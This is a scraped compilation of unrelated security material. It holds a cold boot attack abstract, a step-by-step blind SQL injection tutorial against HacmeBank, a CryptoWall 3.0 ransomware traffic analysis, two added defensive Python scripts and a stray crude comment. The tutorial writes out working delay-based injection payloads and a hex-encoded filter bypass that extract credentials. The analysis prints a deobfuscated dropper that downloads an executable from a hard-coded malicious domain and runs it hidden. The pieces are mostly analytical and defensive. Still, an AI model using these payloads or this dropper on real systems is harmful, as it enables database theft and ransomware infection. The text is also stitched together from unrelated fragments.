Cold boot attacks enable access to the volatile memory of computers which are in a running state or have just been disconnected from power. The attack makes use of the remanence effect of DRAM: data in memory is not immediately erased after loss of power – it slowly disappears. Even after a minute without refresh, data can be found in DRAM. The approach can for instance be used to recover hard disk encryption keys of a locked computer. In the paper, cold boot attacks on DDR2 and DDR3 RAM and their results are presented. While attacks on DDR2 have been demonstrated in the past, attacks on DDR3 have been less successful. The authors explain how they attacked DDR3 RAM of various types and manufacturers. While many PC mainboards overwrite DDR3 before they are powered off, this is not the case for the board of the ASUS Notebook P53E which was used in our experiments. As a result, memory content could be extracted with a measured bit error rate between 0.0007% and 0.07%. For one DDR3 type an attack without cooling was possible, even though the error rate in that case was high (around 80%). Additional analyses of the experimental results revealed that error rates strongly depend on the address space of DRAM. For example, one DRAM type had clear 64 kB memory block boundaries: while some blocks had bit error rates of 6% or 3%, others had 0% error rate. Other DRAM types also showed different error rates for different areas. The effect is most likely related to the initial state of the respective DRAM type.

Thanks for watching this video and you can join us on various social networking sites.
Website: nullcon - International Security Conference 2016
Facebook: NULLCON
Twitter: nullcon (@nullcon) | Twitter
-
Yes, useful.
-
Blind SQL Injection & BurpSuite - Like A Boss

Posted on April 22, 2011 | 0 Comments

SQL injection used to be a lot easier a few years ago when it was less known, web application security was less mature, and errors were often exposed. It's very easy to use a variety of methods to cause errors to display database names, table names, column names, and even row values... when errors are enabled. These days, the SQL injection flaws that I am finding are largely of the "blind" type. To take a rough guess, I'd estimate this to be the case at least 8 out of 10 times. That is fine because blind SQL injection is still relatively easy to exploit... with SQL injection in general still being used to great success in the wild.

There are plenty of SQL injection tools out there that will work with blind or error-based vulnerabilities. Many of these are installed and ready to run on BackTrack 4 R2. SQLMap is a good one, but there are a lot and your success will vary. These tools can do more than just extract database data. They can get you root. Sometimes this just isn't in the cards for a variety of reasons and you just want to show proof of concept that you can pull back sensitive data through the web server. I love Burp's Intruder tool for this. I'll demonstrate some techniques below and use HacmeBank as a target even though errors are completely visible in this purposefully vulnerable app and blind techniques are not necessary.

The first thing we do is identify the vulnerable request:

We can send this request to the Repeater tool and inject the SQL syntax " ' waitfor delay '0:0:30'-- " (omit the double quotes). The vulnerable web application will pass this SQL command directly to the login query, causing a 30-second pause.

That's all just great, but we want to do better than just pause the database during our login query. Let's set the HTTP timeout length from 60 seconds to 29 seconds in Burp's timeout options.

Ok, now we'll send our delay injection request over to the Intruder tool.
This time the SQL syntax is " 'if (len(user)=1) waitfor delay '00:00:30'-- ". It's also necessary to now mark our payload position in Intruder. Put it where the "1" is.

Now that the payload position is marked, we need to define the payload. The SQL question is "How long is the USER variable?" Using a numeric payload, we'll guess 1 through 30, a wide margin indeed.

One more thing to do is to set the Intruder threads to 1, otherwise when one thread delays the SQL database, the others will be delayed as well and false positives will abound.

Now we should get the length of the "USER" variable in the SQL server when this Intruder attack is started. When the correct payload number is guessed, the application will pause for 30 seconds, expiring our 29-second Burp timeout value.

At this point a good thing to know is what those 3 characters are that comprise the "USER" variable's length. Just open another Intruder tab and we'll change the attack quite a bit. This time the SQL syntax will be " ' if (ascii(lower(substring((user),1,1)))=100) waitfor delay '00:00:30'-- " and there are actually two changing payloads (highlighted in bold). One is the position of the character and the second is the ASCII decimal code of the character in that position.

The first payload needs to be numeric and range from 1 to 3 since we know that's the number of the character positions whose ASCII codes we want to guess.

For the next payload, we look up our ASCII codes and ponder a bit. 48-126 will get us 0-9, A-Z, and a-z. In our SQL syntax above, you'll notice that we're using the "lower()" function to reduce the number of ASCII code values to guess, but our number range will include them anyway so we're not saving any time there. Since we're asking for a username, I doubt there are any special characters (32-47) in it so we'll just be lazy and use 48-126.

Running this attack should yield the three ASCII codes for the SQL "USER" variable.
Sorting the results by length will put all of the 0-length, timed out, "true" responses in line. Reading the timed out (true) values:

Payload 1 value 1 = payload 2 value 100 which is "d"
Payload 1 value 2 = payload 2 value 98 which is "b"
Payload 1 value 3 = payload 2 value 111 which is "o"

Dbo, a good proof of concept, but we could have guessed it. Now let's go after some data. How about the SQL syntax " ' if (ascii(lower(substring((select top 1 name from sysobjects where xtype=char(85) and name like '%user%'),1,1)))=100) waitfor delay '00:00:30'-- "? This looks for a table that has the word "user" anywhere within. I'm not trying to be sneaky, and blind SQL injection is inherently not sneaky, so I'm just going to guess the length and set the first payload to 1 through 10. Hopefully the table is 10 characters or less in length. I'll keep the second payload at 48-126 (0-9, A-Z, a-z).

Running this attack should produce the ASCII codes for the first table that contains the word "user."

That looks like 102=f, 115=s, 98=b, 95=_, 117=u, 115=s, 101=e, 114=r, 115=s (fsb_users).

Right on, so now we want the column names for this "fsb_users" table. For that we need to query the native Microsoft SQL "information_schema.columns" table. To do that, we'll use the following SQL syntax: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users'),1,1)))=100) waitfor delay '00:00:30'-- ". Again we'll use two payloads, one for character position and the other for ASCII decimal code.

Running this attack will enumerate the first column in the "fsb_users" table.

That spells "user_id", which is not very important to me, but it does mean that the syntax for the next column in the "fsb_users" table will be " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name>'user_id'),1,1)))=100) waitfor delay '00:00:30'-- ".
Running this attack yields the second column name of the "fsb_users" table.

That's better, because this looks like a column name for which I would be interested in row values. The "user_name" table can be used again, iteratively, to retrieve the third column using the following syntax: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name > 'user_name'),1,1)))=100) waitfor delay '00:00:30'-- ". However, let's take a leap of faith and guess at the password column using the "like" operative: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name like '%pass%'),1,1)))=100) waitfor delay '00:00:30'-- ".

Running this will give us the name of the first column in the "fsb_users" table that contains the string "pass."

So now we have the predictable "password" column, which we can pair with the "user_name" column to start pulling some rows out. The SQL syntax will be " ' if (ascii(substring((select top 1 user_name from fsb_users),1,1))=100) waitfor delay '00:00:30'-- ". I took the "lower()" function out just in case the usernames are case-sensitive in the login function. I want to make sure we account for enough characters that might comprise the first user_name value, so I'll bump payload 1 up to the range 1 - 15. We'll leave the second payload the same as before.

Running this attack should output the first "user_name" value in the "fsb_users" table.

So the first "user_name" is "Jake_Reynolds." The next query will target this user's password. The SQL syntax is " ' if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30'-- ". The payload settings can be left alone, assuming the user's password is 15 characters or less in length.

Running this attack should reveal the password for the user "Jake_Reynolds."
Any web application worth its salt is going to hash the password columns and use salt so that collision attacks are difficult. HacmeBank contains an unhashed database column. The following screenshot illustrates why you should make sure to encrypt or hash your password columns:

"Jake_Reynolds/P@55w0rd" it is then. Let's test it out, of course.

Works for me. Let's take it a little further though. I have run up against web applications that filter for various SQL syntax like "select" and other basic SQL keywords whilst still using vulnerable dynamic SQL statements on the back end. I've always maintained that input validation is not a very effective means of preventing SQL injection and that real remediation means changing your database access layer to use parameterized/precompiled queries. One way I've bypassed input filters that look for common words like "if" and "select" is to create a variable, cast it as hex, and execute it. Take the following SQL syntax for instance:

" ';declare @P varchar(4000);set @P=cast(0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 AS varchar(4000));exec(@P);-- "

The 0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 is simply a hex-encoded version of the string " if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30' ". One extra thing we need to do is to add payload processing rules in Intruder to hex-encode both of our payloads since they occur within the hex cast.
Now when we run this attack, we get the same results as before and we retrieve the password for "Jake_Reynolds", with one exception. Our values are now ASCII-hex-encoded values of ASCII-decimal codes. This time, our results are hexadecimal values for our decimal ASCII codes. So if you follow it:

Payload 1 value 0x31 = 1 = Payload 2 value 0x38 0x30 = 80 = "P"
Payload 1 value 0x32 = 2 = Payload 2 value 0x36 0x34 = 64 = "@"
Payload 1 value 0x33 = 3 = Payload 2 value 0x35 0x33 = 53 = "5"

and so on until you get "P@55w0rd," an admittedly bad password to use on my precious Foundstone bank account. Anyway, that's blind, delay-based SQL injection data extraction the hard way, using BurpSuite to make it easier.

Source: https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss
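As an added example (not code from the original post), a small Python check that shows why the keyword filter described in the post fails and what a check that decodes 0x... literals sees instead; the sample values are the post's own payloads and nothing is sent to a database.

```python
"""Spot the delay-based and hex-cast SQL injection payloads quoted above.

Added example, not code from the original post. It models the input filter
the post says is easy to bypass (a keyword blocklist on the raw value) next
to a check that also looks inside 0x... literals, which is what MSSQL's
cast(0x... AS varchar) turns back into SQL. Sample values are the post's
own payloads; nothing here touches a database.
"""
import re
from dataclasses import dataclass

# The words the post says a naive filter looks for.
NAIVE_WORDS = ("select", "if (", "waitfor delay")
# Extra markers of the hex-cast trick itself.
CAST_MARKERS = ("declare @", "cast(0x", "exec(")

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
DELAY = re.compile(r"waitfor\s+delay\s+'(\d{1,2}):(\d{1,2}):(\d{1,2})'")


@dataclass
class Finding:
    keywords: list      # suspicious tokens seen in raw or decoded text
    decoded_hex: list   # text recovered from 0x... literals
    delay_seconds: int  # longest WAITFOR DELAY requested, 0 if none


def naive_filter_blocks(value: str) -> bool:
    """The weak check: blocklist applied to the raw parameter only."""
    low = value.lower()
    return any(w in low for w in NAIVE_WORDS)


def decode_hex_literals(value: str) -> list:
    """Decode every 0x... literal whose bytes are all printable ASCII."""
    decoded = []
    for m in HEX_LITERAL.finditer(value):
        digits = m.group(1)
        if len(digits) % 2:
            continue                       # odd digit count: not byte data
        raw = bytes.fromhex(digits)
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def delay_seconds(text: str) -> int:
    """Largest delay asked for via WAITFOR DELAY 'h:m:s', in seconds."""
    best = 0
    for h, m, s in DELAY.findall(text):
        best = max(best, int(h) * 3600 + int(m) * 60 + int(s))
    return best


def inspect_parameter(value: str) -> Finding:
    """Look at the raw value and at what its hex literals decode to."""
    decoded = decode_hex_literals(value)
    low = " ".join([value] + decoded).lower()
    kws = [w for w in NAIVE_WORDS + CAST_MARKERS if w in low]
    return Finding(kws, decoded, delay_seconds(low))


# Payloads quoted in the post above.
PLAIN_DELAY = "' waitfor delay '0:0:30'--"
LENGTH_PROBE = "'if (len(user)=1) waitfor delay '00:00:30'--"
HEX_PAYLOAD = ("69662028617363696928737562737472696e672828"
               "73656c65637420746f7020312070617373776f72642066726f6d20"
               "6673625f757365727320776865726520757365725f6e616d65203d20"
               "274a616b655f5265796e6f6c647327292c312c3129293d3130302920"
               "77616974666f722064656c6179202730303a30303a333027")
HEX_CAST = ("';declare @P varchar(4000);set @P=cast(0x" + HEX_PAYLOAD +
            " AS varchar(4000));exec(@P);--")

if __name__ == "__main__":
    for sample in (PLAIN_DELAY, LENGTH_PROBE, HEX_CAST):
        print("naive filter blocks:", naive_filter_blocks(sample))
        print("decoded view:", inspect_parameter(sample))
```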
-
CryptoWall 3.0 traffic analysis

Posted on October 29, 2015 by Admin

A glimpse inside CryptoWall 3.0

Background

CryptoWall is known to be one of the most popular ransomware. The FBI says it has received 992 complaints about CryptoWall, with victims reporting losses of $18m. Symantec also said that ransomware attacks have more than doubled in 2014 from 4.1 million in 2013, up to 8.8 million. It's using today's most sophisticated exploit kits such as Nuclear, Neutrino, and Angler in order to infect the victim. Consequently, this ransomware is using all ways possible to infect victims. The main goal of this destructive malware is to search for all files with certain extensions on the victim's computer and network drives to encrypt them. It then asks for a ransom, which is normally $500 USD (and doubles after a certain period of time) for decryption.

CryptoWall payment page

Infection Vector

The ransomware has multiple ways to infect victims. However, we often see malicious infected email attachments sent to victims containing the dropper. One of the droppers that we studied came from an email attachment in a .zip file. It contained an obfuscated JavaScript file which is used for downloading the payload. It is also common to see Word documents containing a malicious VBA macro.
.ZIP file received by email, containing a JavaScript file

After deobfuscation of the file, we got this code:

function dl(fr, fn, rn) {
    var ws = new ActiveXObject("WScript.Shell");
    // target path: %TEMP%\<fn> (0x5C is the backslash)
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function () {
        if (xo.readyState === 4) {
            // save the HTTP response body to disk as a binary stream
            var xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn, 2);
            xa.close();
        }
    };
    try {
        xo.open("GET", fr, false);
        xo.send();
        if (rn > 0) {
            ws.Run(fn, 0, 0);   // run the saved file, hidden window
        }
    } catch (er) {
    }
}
dl("http://22072014b.com/images/global1.jpg", "16477935.exe", 1);
dl("http://22072014b.com/images/global1.jpg", "89555869.exe", 1);

This script is used to download the payload (from a hard-coded URL) of CryptoWall 3.0, rename it and execute it from the TEMP directory. It's interesting to note that the original payload is a .JPG file, which is a simple trick to hide itself. We believe that this domain (22072014b.com) is owned by the bad guys and it also seems to use the fast flux DNS technique.
However, this domain is currently suspended by ICANN.

Execution

As described in many articles¹ ² ³, CryptoWall begins by:

- Generating a unique computer identifier by calculating an MD5 hash based on the system hardware and software (computer name, volume serial number, OS version ...)
- Spreading itself in a new folder in C:\ and the AppData folder, then adding an entry in the startup programs
- Deactivating:
  - Shadow Copies
  - Startup repair
  - Windows error recovery
- And stopping:
  - Windows Security Center Service
  - Windows Defender
  - Windows Update Service
  - Windows Error Reporting Service and BITS
- Injecting itself into explorer.exe, svchost.exe
- Making a GET request to ip-addr.es to retrieve the external IP address
- Making HTTP requests to retrieve the public key for encryption
- Starting encryption (AES-256) of selected files, extensions and directories
- Copying HELP_DECRYPT instructions in every folder in which files were encrypted

Although this process is complex enough to make an article on its own, the area that we've focused on is mostly the network communication side.

Emulate communication with the C&C

In order to learn more about the communication with the Command and Control, a program was made to simulate the request of an infected computer.

First, the malware uses a URL pre-coded in the payload to start the communication. In all cases, the URLs are infected WordPress websites. Because infected WordPress sites normally get cleaned up or suspended within a few weeks, CryptoWall comes with numerous pre-coded URLs with which it will try to communicate. The URL changes each time we see a new sub-version of CryptoWall 3.0.

The URL looks like the following:

http://domain.com/wp-content/plugins/infected_path/3.php

All communication with the C&C is encrypted in RC4.
The RC4 key is passed in the URL parameter and the cipher text is in the POST method.

The malware first sends a hello message to the C&C before getting the actual encryption key:

Using this Python script, we can decrypt the message easily:

Request: {1|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|5|2|1||128.204.196.126}
Response: {264|1}

The message is formatted for the command and control, revealing: the message ID, the version of CryptoWall, the unique MD5 hash previously generated, some other flags and the public IP address of the computer.

After, the infected computer replies with another message:

Request: {7|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|1}
Response: {176|ayh2m57ruxjtwyd5.onion|1egeY33|NL|-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY6b3Ea6NYvFAz3BMBRr
zS9TZrnAdg2FksXisD95iFBSbWjMXQlWf4YuU84cyDvmRBpicbaN6K3Rkk1EjW4G
lAA3jEZi2IvapsJpKoXhMIVxOhqbni+LQMsdsnEB+3FGWNHW7YvBwUSDvJbD+0qG
i1fNzbL/AZ8Wz5g7wbrUzGSsi+Yjj37nQuPRDz4AheKayMsz9ENvOLvqhA+Malpv
eOLwDMncsRr4byu9QuWRCvyoas5z86IBq/l4LKGeJO1my6ICvRQZ4QExwDTQBWKy
0G7B8niBVYHDOHIe3Owp2C6y7WzolP97WCwsuYB2kmGHnhtas4uTRQ/6IYZcK47E
gQIDAQAB
-----END PUBLIC KEY-----}

At this last stage, the C&C replied with the TOR link for the ransom, the personal ID and the public RSA key. The infected computer will then start encrypting files with that key.

Knowing this, we were able to establish by ourselves the different values that would be sent to the C&C in our program. We only had to generate MD5s that hadn't already been received by the ransomware server to make it believe that we were a new victim. One of the ideas was to exhaust the server with our requests. Using this program in a loop, we were able to generate many different unique IDs and public keys. Since a unique ID is normally 7 characters long (case-sensitive, plus a mix of digits), 58^7 IDs are possible in theory.
Because we're able to generate no more than 1000 requests per minute, it would have taken far too long to exhaust all possible IDs.

Investigation on the infected WordPress

To advance further in the investigation, we chose to take a look at recent samples of CryptoWall 3.0 from Hybrid Analysis to find commonalities between the different infected WordPress sites. After looking at multiple infected pages, we didn't notice a common vulnerability, except that the infected path always seems to be part of a WordPress plugin.

However, two of the WordPress sites observed had a PHP backdoor installed, which is a PHP file that allows the attacker to have a web control panel:

With this malicious code, they can access and control multiple things on the servers. Furthermore, this allowed us to download the code which serves to respond to infected computers. Getting our hands on this file allowed us to move forward to better understand the communication and the infection process.

What we can see in this PHP code is that the ransomware:

- Decrypts the encrypted message with the RC4 key in the parameter
- Makes validations to ensure that the message is in the right format and strips the brackets
- Forwards the message content to the mothership at the hard-coded IP address

We tried it by installing a PHP server on a local computer and making a fake call to the CryptoWall PHP file. We then captured the traffic exchanged between the server and the mothership:

Request: {7|crypt19|7A1A7EA984BD56663C7A5558576C3559|1}

So it becomes clear that the infected WordPress only acts as a filter and a relay. It also helps to conceal the ransomware infrastructure.

Since the file in question was used at the same time to respond to infected computers, we took the opportunity to add a few lines of code to record the requests made to it in a text file. We also neutralized the code by commenting out the part which forwarded the request.
The output file gave us information about the time at which the request was made, the originating IP address and the CryptoWall message (version, unique MD5 identifiers ...) for each computer calling it.

Each of these entries represents a query made by an infected computer to this specific infected page. On the first website, we were able to collect data only for 29 hours before the account got suspended by the provider (2015-09-30 to 2015-10-02) and we got 40228 entries in the text file. The second one lasted 88 hours before the bandwidth limit was exceeded and allowed us to get 130146 entries (capturing from 2015-10-23 to 2015-10-27).

After removing redundant entries in both files by comparing the unique identifier of victims (MD5 hash), only 3546 entries were left from the first one and 15068 from the second one. The reason why so many entries were duplicated is that a single infected computer will sometimes make more than 2 requests before being able to receive an answer from the C&C.

We then used Elasticsearch and Kibana to visually represent the data:

Requests made to the first WordPress site over 29 hours

Requests made to the second WordPress site over 88 hours

We then aggregated the data of both WordPress sites to pull out statistics about the victims. The MaxMind databases were used to find the country and the AS from the originating IP addresses of those entries:

Top originating AS of victims

Top country of victims

World map representing victims' location from our dataset

Multiple sub-versions of CryptoWall were also observed:

Different versions used by CryptoWall

By regrouping both sets of data together and removing the duplicate entries based on the MD5 hash, we accumulated 18614 unique infected users. On the first set of data, 3546 unique IDs were collected over a period of 29h, which makes approximately 122.27 unique victims per hour.
On the second set of data, 15068 unique IDs were collected over a period of 88h, which makes approximately 171.22 unique victims per hour. Calculating the average of both, we obtain approximately 146 unique infected users per hour, which makes 3504 per day and 105120 per month. Using numbers from US-CERT via Symantec, approximately 2.9% of users pay the ransom. With an average ransom of $500, this means malicious actors profited $52560 per day, $1576800 per month and $18921600 per year just with this part of the infrastructure that was discovered. However, it is difficult to be 100% accurate with these numbers.

Glimpse of the Mothership

Since we now had the IP address of the mothership from the PHP files on the infected WordPress sites, we started investigating it. The first IP was 95.128.182.22 and the second 95.128.182.121. Both of the IPs were registered by an ISP named TrustInfo, in Moscow, Russia. The IP addresses have at least 3 open ports in common: 22, 80 and 3389. By browsing through them, we can't see much except a blank page on the main page. But after looking for other active pages on the servers, we found that the server status page was enabled:

As you can see, the server is apparently hosting a TOR hidden website (xtpdvz6dnj5nnpe7.onion). This hidden website is also a known TOR address from the ransom of CryptoWall 3.0. It's using an NGINX proxy to forward requests. The POST requests that we're seeing are all the different WordPress sites forwarding the requests to the mothership, and the parameter on each of these requests is the only RC4 key for decrypting the communication.

Accessing the ransom page directly

By taking a look at the autonomous system information, we saw that the ISP TrustInfo has 3 subnets. We decided to investigate further in those subnets, searching for servers that had the same ports open with the same version of services.
For instance, we looked for hosts that had port 22 with OpenSSH version 6.0 and port 80 with NGINX 1.2.1. One subnet in particular, 95.128.180.0/22, had a lot of hosts matching these criteria.

After verifying each of them, by establishing whether the page http://ip/server-status/ showed us the same TOR address and had the same uptime, we found 9 more servers than the two previously discovered:

CryptoWall 3.0 architecture

Thus, mothership servers are playing at least two roles: forwarding the requests of infected victims and supporting the TOR website to pay the ransom. Since NGINX is installed on all of them, and they all refer to the same Apache server, they seem to serve only as a gateway, which makes us believe that the secret keys are stored elsewhere, well kept away from us.

By comparing all the different requests made on the server status page, some GET requests got our attention. This led us to a login page on this same server:

At first look, it seems to be the management page for the owners of CryptoWall. This page seems to be custom made. They are doing basic authentication with a username and a password. The password is hashed in MD5 client-side before being passed by the POST request to the server. After 3 failed attempts, the system refuses any more tries. It is however possible to reset the number of failed attempts by deleting the PHPSESSID cookie. However, we don't know what this page provides access to.

After monitoring the status page, we also did some statistics:

Request type received by the server

CPU load over time

Total access requests to the server over time

At its peak, the server behind the proxy has processed almost 44 GB of data in 30 days

Protection against ransomware

In order to protect computers against all types of viruses, there should always be, at a minimum, an updated antivirus. However, in this research we saw many samples that weren't detected by any antivirus on VirusTotal.
In these cases, email attachment filters are really useful, because a lot of the infections are coming from this vector. Also, limiting advertising when surfing the internet with a proxy (to avoid malvertising, which can exploit other vulnerabilities) and using an IPS will help. Blocking servers that infected computers will contact is not very effective, because they change very often and the payload normally knows multiple websites to contact.

Some other methods may be useful if you want to be alerted about a new infected computer making requests. You can make a rule in your firewall that alerts you when someone visits http://ip-addr.es, which is used every time by CryptoWall to gather the external IP address. Other ransomware also use this technique but with various websites. There is also a way to be alerted by your SAN by watching the I/O by users. In fact, computers infected by a ransomware will try to encrypt network drives aggressively, which can be detected by looking at the number of transactions in a certain time frame.

You can also block the execution of programs in the temporary directory of Windows. There is no reason why a program should start from there, and it is often used by malware. This procedure will show you how to create GPOs to do that.

You should however be prepared no matter what and have backups for your systems.

Conclusion

Given that all mothership servers seem to have the same configuration, they are probably deployed automatically from a template by the attacker. Moreover, the fact that we see new infected WordPress sites with CryptoWall 3.0 almost each week demonstrates the organization of the attacker, because this also implies that they must update the ransomware each time so that the malware has the right URLs to contact.

This whole process is well structured, it evolves to avoid being detected and seems to have become the new trend for hackers to make money.
Other aspects of the ransomware would have been interesting to investigate, but because of the lack of time we didn't go any further.

Feel free to contact me for any questions, suggestions or comments at malware @ brillantit.com

References: Intel TALOS, Vallejo, Sentinel One, TrendMicro, SecureWorks

Source: http://blog.brillantit.com/?p=15
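An added example, not code from the original write-up: a decoder for the C&C check-in as the post describes it (RC4-encrypted POST body, key carried in the URL query string, pipe-delimited {id|version|md5|...} plaintext), wired into a small triage pass over constructed proxy-log entries that covers the two network indicators named in the protection section, the ip-addr.es lookup and the POST to a WordPress relay path. It assumes the query value is used verbatim as the RC4 key and that the body is hex-encoded; the log entries and the key are constructed, not captured traffic.

```python
"""Decode and triage CryptoWall 3.0 style C&C check-ins from proxy logs.

Added example, not code from the original write-up. It follows the protocol
as the post describes it: RC4-encrypted POST body to an infected WordPress
path, RC4 key carried in the URL query string, plaintext shaped like
{id|version|md5|...}. Assumed here (not stated in the post): the query
value is used verbatim as the RC4 key and the body is hex-encoded. The log
entries below are constructed samples, not captured traffic.
"""
import re
from urllib.parse import urlparse


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encrypt and decrypt are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# {message id|CryptoWall version|victim MD5|remaining pipe-separated fields}
CHECKIN = re.compile(r"^\{(\d+)\|(crypt\d+)\|([0-9A-F]{32})\|(.*)\}$")
# Relay path shape from the post: .../wp-content/plugins/<plugin>/<n>.php
RELAY_PATH = re.compile(r"/wp-content/plugins/[^?]+/\d+\.php$")


def parse_checkin(plaintext: str):
    """Split a decrypted check-in into fields; None if the shape is wrong."""
    m = CHECKIN.match(plaintext)
    if not m:
        return None
    msg_id, version, victim_id, rest = m.groups()
    return {"msg_id": int(msg_id), "version": version,
            "victim_id": victim_id, "fields": rest.split("|")}


def decrypt_checkin(url: str, body_hex: str):
    """RC4-decrypt a POST body with the key taken from the URL query string."""
    parts = urlparse(url)
    key = parts.query.split("=", 1)[-1]        # handles ?abc and ?k=abc
    if not key or not RELAY_PATH.search(parts.path):
        return None
    try:
        plain = rc4(key.encode(), bytes.fromhex(body_hex)).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None                            # not hex or not text: benign
    return parse_checkin(plain)


def triage(entries):
    """Return (reason, detail) alerts for the two indicators in the post."""
    alerts = []
    for e in entries:
        host = urlparse(e["url"]).hostname
        if e["method"] == "GET" and host == "ip-addr.es":
            alerts.append(("external-ip lookup", e["src"]))
        elif e["method"] == "POST":
            info = decrypt_checkin(e["url"], e["body"])
            if info:
                alerts.append(("cryptowall check-in",
                               f'{e["src"]} {info["version"]} {info["victim_id"]}'))
    return alerts


# --- constructed sample traffic (key and addresses are made up) ----------
KEY = "q9z2p7"
HELLO = "{1|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|5|2|1||128.204.196.126}"
SAMPLE_LOG = [
    {"src": "10.0.0.15", "method": "GET", "body": "",
     "url": "http://ip-addr.es/"},
    {"src": "10.0.0.15", "method": "POST",
     "body": rc4(KEY.encode(), HELLO.encode()).hex(),
     "url": f"http://example.invalid/wp-content/plugins/some-plugin/3.php?{KEY}"},
    {"src": "10.0.0.22", "method": "POST", "body": "757365723d616c696365",
     "url": "http://example.invalid/wp-content/plugins/some-plugin/3.php?id=7"},
    {"src": "10.0.0.31", "method": "GET", "body": "",
     "url": "http://example.invalid/"},
]

if __name__ == "__main__":
    for reason, detail in triage(SAMPLE_LOG):
        print(f"ALERT {reason}: {detail}")
```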
-
If it were Steve Jobs's birthday, you'd be jumping for joy and kissing his dick. This man has helped the world. https://en.wikipedia.org/wiki/Bill_%26_Melinda_Gates_Foundation